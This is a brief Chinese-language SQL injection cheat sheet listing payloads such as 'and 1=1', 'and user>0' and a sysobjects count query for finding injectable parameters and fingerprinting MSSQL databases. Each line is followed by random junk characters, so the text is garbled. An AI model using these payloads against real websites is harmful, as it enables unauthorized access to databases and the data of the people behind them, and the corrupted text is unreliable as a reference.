1.判断是否有注入;and 1=1 ;and 1=2 Hl*vS
2.初步判断是否是mssql ;and user>0 :t?B)
}r}*=;Ea
3.注入参数是字符'and [查询条件] and ''=' ZWs
V35Vi6*p
4.搜索时没过滤参数的'and [查询条件] and '%25'=' &H(yLd[
jU,Xlgz(A
5.判断数据库系统 OLw]BJXYaE
Bous d
;and (select count(*) from sysobjects)>0 mssql i1iP'`r
-@To<